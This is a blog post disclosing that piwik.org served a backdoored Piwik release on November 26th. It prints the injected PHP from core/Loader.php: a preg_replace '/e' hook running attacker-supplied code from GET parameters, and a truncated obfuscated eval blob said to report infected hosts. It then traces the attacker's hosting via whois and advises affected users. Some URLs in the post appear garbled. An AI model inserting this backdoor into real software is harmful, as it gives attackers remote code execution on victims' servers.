It appears that between 15:43 UTC to 23:59 UTC on November 26th, the piwik.org web server was serving a backdoored version of the popular open-source web analytics tool. This version contained some PHP code that essentially allowed for unlimited remote code execution and posted each compromise to a remote domain:

php Error_Reporting(0);       if(isset($_GET[’g’]) && isset($_GET[’s’])) {





preg_replace(“/(.+)/e”, $_GET[’g’], ‘dwm’);     exit;





}





if (file_exists(dirname(_FILE_).“/lic.log”)) exit;





eval(gzuncompress(base64_decode(’eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF





/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$[..]

The eval() portion in the lower part contains a postback to http://http://www.zjjv.com///x.php, sending the value of $_SERVER[’HTTP_HOST’] and by that giving the backdoor developer an indicator that he has just successfully infected another victim.

The actual backdoor is in the upper part. If the GET variables “g” and “s” are set, the static string “dwm” is replaced with the contents of $_GET[’g’] and the resulting string is evaluated as PHP code (/e modifier).

The backdoor postback site is still up and hosted by a company called “justhost.com”, It seems to be on a shared server. The website of justhost looks like a run-of-the-mill quasi-anonymous US hoster, with lots of shiny colorful award badges, stock imagery and (probably) a template from templatemonster.

Whois shows that the actual carrier is “unified layer”:

NetRange:       50.87.0.0 - 50.87.255.255





CIDR:           50.87.0.0/16





OriginAS:       AS46606





NetName:        UNIFIEDLAYER-NETWORK-9





NetHandle:      NET-50-87-0-0-1





Parent:         NET-50-0-0-0-0





NetType:        Direct Allocation





RegDate:        2011-01-24





Updated:        2012-11-14





Ref:            http://http://www.zjjv.com///rest/net/NET-50-87-0-0-1

















OrgName:        Unified Layer





OrgId:          BLUEH-2





Address:        1958 South 950 East





City:           Provo





StateProv:      UT





PostalCode:     84606





Country:        US





RegDate:        2006-08-08





Updated:        2012-11-26





Ref:            http://http://www.zjjv.com///rest/org/BLUEH-2

The ARIN hdl “BLUEH-2” made me curious and after another minute of digging, I found that the AS serving the above mentioned network is actually AS46606, which is owned by BLUEHOST. Purportedly, this is one of the biggest hosters worldwide (I just heard of them for the first time in my life). Hopefully, they will C&D this abuse site soon.

If you updated your Piwik installation on Nov 26th, check piwik/core/Loader.php for the exploit code shown above and if you find it (or anything else which looks fishy), replace with a clean installation from piwik.org.

To the piwik guys: Signed archive hashes would probably be a good idea.

Piwik sourcecode backdoored Posted by Christopher Kunz

at

11:25

Defined tags for this entry: /e, backdoor, piwik, preg_replace, remote code execution